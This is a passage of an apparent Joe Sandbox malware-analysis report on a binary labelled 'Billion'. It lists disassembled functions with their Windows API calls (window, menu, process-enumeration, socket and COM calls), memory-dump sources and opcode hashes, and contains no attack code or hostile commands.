                                                                                                                                                                                                                                                                                                          • API String ID: 2587070983-1858400284
                                                                                                                                                                                                                                                                                                          • Opcode ID: da5f0a81c46d6b03e3488d6ee30eba88293e574a825097e87bdb2ac28e3a275f
                                                                                                                                                                                                                                                                                                          • Instruction ID: dc328ed0157ab5492a43d196854d5761efe56cb42266ed546b2d9e03db1baf70
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da5f0a81c46d6b03e3488d6ee30eba88293e574a825097e87bdb2ac28e3a275f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21ED34216B09CFDB18DB19F89CB2537F2BB54B15F25415BF84697262CB349C48DB01
                                                                                                                                                                                                                                                                                                          Function 001C6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001C6360
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001C638D
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 001C639C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: e884aeaab42d244c09d70437716f5b26a25a796563d6e854b39ffbefae77775c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 150779beb1d2f32ddc2094519d1b4cdccb435952e04d8cb364ec1307542136c8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e884aeaab42d244c09d70437716f5b26a25a796563d6e854b39ffbefae77775c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE016D71500258EFDB119F51DC84FAE7BB5FF58351F108099E849DA151DB30CA85EF21
                                                                                                                                                                                                                                                                                                          Function 001C823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,002028E0,001CAD55,000000FC,?,00000000,00000000,?), ref: 001C823F
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001C8247
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 001C82B4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3601265619-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8a9d86928b831486b985a62773e7e57d82775ee83af5c6589874b44909d714ca
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f41ab4e897a7d2080ab6dff85a091ba66ba0cc60cf9d38755209ae9aa574486
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a9d86928b831486b985a62773e7e57d82775ee83af5c6589874b44909d714ca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D015231202610CFC7159B68E89CE7537A6EB99324F14016DE516876A1DB31AC4BCB50
                                                                                                                                                                                                                                                                                                          Function 001C8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 001C8576
                                                                                                                                                                                                                                                                                                          • CreateAcceleratorTableW.USER32(00000000,?,?,?,001ABE96,00000000,00000000,?,00000001,00000002), ref: 001C858C
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,001ABE96,00000000,00000000,?,00000001,00000002), ref: 001C8595
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 986409557-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 10bcf18ffb1c6e231061e867041d4aa38e46f267d9b81f5d0932188500698541
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ceb1a9e5174e73f9506afe2728fdffc8a8aa4c711c8995eb687c7cda9c70a41
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10bcf18ffb1c6e231061e867041d4aa38e46f267d9b81f5d0932188500698541
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08011730601308CFCB249F68E8CCF657BB1FB64325F20852EE511866B1DB70E998CB40
                                                                                                                                                                                                                                                                                                          Function 001C8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00204038,0020407C), ref: 001C8C1A
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 001C8C2C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID: 8@ $|@
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-1909839795
                                                                                                                                                                                                                                                                                                          • Opcode ID: e1559ae7dedf971b16b2d79b37de425e01f8c5f3ad188225d495d4298d3ba8a3
                                                                                                                                                                                                                                                                                                          • Instruction ID: bfb082a9c47afdd146b964ea854a2db9d80ce4fc3d9b83049c2a70cd0bf3d179
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1559ae7dedf971b16b2d79b37de425e01f8c5f3ad188225d495d4298d3ba8a3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF03AF2541314BAF3147B60BC89FB73E5DEB15755F008021BF08EA1A2D675881482A9
                                                                                                                                                                                                                                                                                                          Function 0019096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: ad7367a1aeb0cc08802cf8dfd45b0ee3fc189e0b36f18b3b371a3fb7fc8bda2c
                                                                                                                                                                                                                                                                                                          • Instruction ID: f7719afaa438954cbe3f055c48154efe4dae5d609a41771b9bf67e6642e542a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad7367a1aeb0cc08802cf8dfd45b0ee3fc189e0b36f18b3b371a3fb7fc8bda2c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC16C75A0021AEFDB05CF94C894EAEB7B5FF48704F118598E906EB251D731EE81DB90
                                                                                                                                                                                                                                                                                                          Function 001641F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f0ee67d956d74b5eaff0a09c73cab7471868c9271488812ede0d7e496c5bba2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4A15772A003969FDB25CF18CC927AEBBE5FF61314F2441ADE9959B381C7388961C750
                                                                                                                                                                                                                                                                                                          Function 00190D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190EE0
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190EF8
                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,001CDCE0,000000FF,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190F1D
                                                                                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00190F3E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a817a805bb97cad83ea43780d9979207f67477519b49451b637c4d364f21990
                                                                                                                                                                                                                                                                                                          • Instruction ID: 06ae0e5654640688b3d735e3ebded30d496242ee450a27b03cfb475ba88fb2a2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a817a805bb97cad83ea43780d9979207f67477519b49451b637c4d364f21990
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34811875A00109EFCF05DF98C984EEEB7B9FF89315F204598E506AB250DB71AE46CB60
                                                                                                                                                                                                                                                                                                          Function 001BB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 001BB10C
                                                                                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 001BB11A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 001BB1FC
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BB20B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00174D73,?), ref: 0014E395
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ad0cbd0be8ba5b9d7f8cb278cff0baa4f43dbdc57de27f4e1702e71f7d6ac114
                                                                                                                                                                                                                                                                                                          • Instruction ID: 82fdd3f4b8234adce705281161a59edf2b25972805d2649ab0c68d75dd5e2ba1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad0cbd0be8ba5b9d7f8cb278cff0baa4f43dbdc57de27f4e1702e71f7d6ac114
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9513CB1508300AFD310EF24D886A6FBBE8FF98754F40496DF59597291EB70E904CB92
                                                                                                                                                                                                                                                                                                          Function 00171711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a3c623cd1cd3cfa86860fae3017c291f191cec1efd22707d7ad87e7facb8d91
                                                                                                                                                                                                                                                                                                          • Instruction ID: 596c3ed65961fd31a4f11482a66d2b5633c2b99b56c61d416c096be52e427f57
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a3c623cd1cd3cfa86860fae3017c291f191cec1efd22707d7ad87e7facb8d91
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4413B31600100BBDB257FFD9C86ABE3ABAEF61730F148229FC2CDB191DB3548415662
                                                                                                                                                                                                                                                                                                          Function 001B2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001B255A
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B2568
                                                                                                                                                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001B25E7
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B25F1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f4b0d3e80f0b0a7626bdf2a978f29be8678d4a40fd36b51662aa25797d2673a4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 556682a934f29a00ecf3034b742225b1b590916c808b691671bde4af608690b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4b0d3e80f0b0a7626bdf2a978f29be8678d4a40fd36b51662aa25797d2673a4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8341D075A00300AFE720AF24C886F6A77E5AB14758F54C45CF91A8F6D2C772ED82CB90
                                                                                                                                                                                                                                                                                                          Function 001C6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C6D1A
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C6D4D
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001C6DBA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c422b0870012080241a1d7453d653078ead71b3e2448ca1bc9de506ca5617f33
                                                                                                                                                                                                                                                                                                          • Instruction ID: 242c707575bf00d48fd200b06c5efcfe2b36cc7d17ca33930ed6bbb69ffa5c7e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c422b0870012080241a1d7453d653078ead71b3e2448ca1bc9de506ca5617f33
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151FB74A00209EFCF24DFA4D884EAE7BB6EB64320F20856EE95597291D730ED81CB50
                                                                                                                                                                                                                                                                                                          Function 0016B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
